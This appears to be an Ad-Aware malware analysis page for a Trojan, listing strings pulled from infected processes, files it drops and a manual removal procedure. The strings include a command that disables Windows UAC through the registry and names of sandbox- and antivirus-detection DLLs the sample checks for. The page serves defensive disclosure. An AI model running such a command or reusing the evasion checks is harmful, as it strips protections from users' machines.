"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa4.tmp
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
571081478
cceeded with download, running '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'
%Documents and Settings%\All Users\Application Data\BigFishCache
{"IDENTIFIER":"0", "IDENTIFIER_TYPE":"DOWNLOADID", "CURRENT_SITEID":"", "CURRENT_LANGUAGEID":"", "STUB_LANGUAGEID":"1", "STUB_SITEID":"1", "COUNTER":"0","UPGRADESOURCE":"DOWNLOAD", "VERSION_TO":"%VERSION_TO%", "VERSION_FROM":"0.0.0.0", "OSNAME":"XP", "OSVERSION":"5.1.2600.5512", "INSTALLATION_STATUS":"%INSTALLATION_STATUS%","ERROR_LEVEL":"%ERROR_LEVEL%"}
{4CFDE078-C665-429D-9A80-1C8F5D0EF06D}
3.3.0.2
04090000

Ptype.exe_1144:




.idata
.rdata
P.reloc
P.rsrc
BuildImportTable: can't load library:
BuildImportTable: ReallocMemory failed
BuildImportTable: GetProcAddress failed
BTMemoryLoadLibary: BuildImportTable failed
BTMemoryGetProcAddress: no export table found
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
kernel32.dll
76487-644-3177037-23510
55274-640-2673064-23950
sbiedll.dll
dbghelp.dll
RLHOOK32.DLL
snxhk.dll
Software\Microsoft\Windows\CurrentVersion
ntdll.dll
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
%sysdir%\
%sysdir%
~a39.log
cmd_.bat
sevane.tmp
user32.dll
cmd.dll
~a21524.log
GetProcessHeap
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
WinExec
GetWindowsDirectoryA
wsock32.dll
shell32.dll
ShellExecuteA
7'7 7/73777;7?7!8<8
KWindows
66006666

bfgsetup_s1_l1.exe_1796:




.text
`.rdata
@.data
.ndata
.rsrc
tDSSh
%s %s
... %d%%
verifying installer: %d%%
ADVAPI32.dll
~nsu.tmp\
shlwapi.dll
%u.%u%s%s
KERNEL32.dll
.DEFAULT\Control Panel\International
*?|<>/":
\wininit.ini
%s=%s
%Program Files%
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegDeleteKeyA
RegCloseKey
RegEnumKeyA
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
ole32.dll
VERSION.dll
Au_.exe
RichEd20.dll
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /D=%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack
/STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
gsetup_s1_l1.exe
ALS~1\Temp\nsxA.tmp\System.dll
Thawte Certification1
http://ocsp.thawte.com0
.http://crl.thawte.com/ThawteTimestampingCA.crl0
http://ts-ocsp.ws.symantec.com07
 http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at https://www.verisign.com/rpa (c)101.0,
/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0;
/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0
https://www.verisign.com/cps0*
#http://logo.verisign.com/vslogo.gif04
#http://crl.verisign.com/pca3-g5.crl04
http://ocsp.verisign.com0
Nullsoft Install System v2.46-Unicode
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxA.tmp
nsxA.tmp
TH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
%Documents and Settings%\All Users\Application Data\BigFishCache
d Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
bfgsetup_s1_l1.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
4! # #%%$#
J(.Bu
Nullsoft Install System v06-Dec-2010.cvs
3.3.0.2
04090000
04070000

bfgsetup_s1_l1.exe_552:




.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
7%0xO
u: %d/%d trang...Kh
m.&Back&Forward&ReloadReload no cache&Stop&Undo&RedoCu&t&Copy&Paste&DeleteSelect &all&Find...&Print...View Source...
%dHTML
&Back&Forward&ReloadReload no cache&Stop&Undo&RedoCu&t&Copy&Paste&DeleteSelect &all&Find...&Print...View Source...
.reloc
8)u%f
AccessControl.dll
ClearOnRegKey
DenyOnRegKey
DisableRegKeyInheritance
EnableRegKeyInheritance
GetRegKeyGroup
GetRegKeyOwner
GrantOnRegKey
RevokeOnRegKey
SetOnRegKey
SetRegKeyGroup
SetRegKeyOwner
.text1
.adata
.data1
.pdata
4! # #%%$#
J(.Bu
Nullsoft Install System v2.46-Unicode
verifying installer: %d%%
unpacking data: %d%%
... %d%%
http://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
ent.exe
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscD.tmp\System.dll
ol.dll
og\gamemanager_install_log.txt
scD.tmp
OCALS~1\Temp\nscD.tmp\System.dll
er.bmp
EnumerateSubKeys
CreateSubKey
GenericExecute
Cannot apply new access control list. Error code: %d
Cannot build new access control list. Error code: %d
Cannot read access control list. Error code: %d
Bad permission flags (%s)
Bad trustee (%s)
Cannot change access control list inheritance. Error code: %d
Cannot apply new ownership. Error code: %d
Cannot open process token. Error code: %d
Bug: Unsupported change mode: %d
Cannot look up owner. Error code: %d
Cannot get current ownership. Error code: %d
Root key name missing
Registry key name missing
Bad root key name (%s)
Couldn't lookup current user name. Error code %d:
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscD.tmp
nscD.tmp
\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
d Settings\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe
%Documents and Settings%\All Users\Application Data\BigFishCache
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack
%Program Files%\bfgclient
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller
bfgsetup_s1_l1.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxB.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe
1510605463
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
3.3.0.2
04090000

Ptype.exe_1144_rwx_13140000_00011000:




.idata
.rdata
P.reloc
P.rsrc
BuildImportTable: can't load library:
BuildImportTable: ReallocMemory failed
BuildImportTable: GetProcAddress failed
BTMemoryLoadLibary: BuildImportTable failed
BTMemoryGetProcAddress: no export table found
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
kernel32.dll
76487-644-3177037-23510
55274-640-2673064-23950
sbiedll.dll
dbghelp.dll
RLHOOK32.DLL
snxhk.dll
Software\Microsoft\Windows\CurrentVersion
ntdll.dll
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
%sysdir%\
%sysdir%
~a39.log
cmd_.bat
sevane.tmp
user32.dll
cmd.dll
~a21524.log
GetProcessHeap
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
WinExec
GetWindowsDirectoryA
wsock32.dll
shell32.dll
ShellExecuteA
7'7 7/73777;7?7!8<8
KWindows
66006666






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060
    WScript.exe:368
    CrashHandler.exe:420
    CrashHandler.exe:680
    HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648
    bfgsetup_s1_l1.exe:1796
    %original file name%.exe:1236
    reg.exe:1164
    reg.exe:620
    reg.exe:232
    reg.exe:204
    reg.exe:1832
    reg.exe:508
    reg.exe:1352
    reg.exe:1292
    reg.exe:280
    reg.exe:308
    reg.exe:1176
    reg.exe:996
    reg.exe:468
    reg.exe:208
    reg.exe:1356
    reg.exe:1496
    reg.exe:964
    reg.exe:904
    reg.exe:968
    reg.exe:2024
    reg.exe:644
    reg.exe:1100
    reg.exe:544
    reg.exe:1764
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Ptype.exe (3312 bytes)
    %Documents and Settings%\%current user%\CrashHandler.exe (81017 bytes)
    %Documents and Settings%\%current user%\Application DataFilename.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (1960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (589 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (2341 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (3821 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (706 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (2342 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (731 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (16699 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (4448 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (6386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (1137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (1098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UserInfo.dll (3 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe (5731 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (429 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~a21524.log (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\UserInfo.dll (3 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe (1120371 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\System.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_en.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_fr.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_es.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_sw.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_de.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_de.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_pt.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_dn.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_it.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_it.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_fr.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_pt.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_en.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_jp.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_es.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\AccessControl.dll (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_dn.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_jp.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_du.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_du.ini (3 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamemanager_install_log.txt (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\uac.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsxC.tmp (1178954 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\modern-header.bmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_sw.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE (237 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\NSISdl.dll (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S1YHUDA9\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\uac.dll (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\inetc.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IJE9GDOV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5KLKDKJ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\nsProcess.dll (4206 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (36 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe (2998318 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IRCX4XCX\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\System.dll (11 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamestub_t_install_log.txt (37602 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (318 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\throttle.txt (2 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now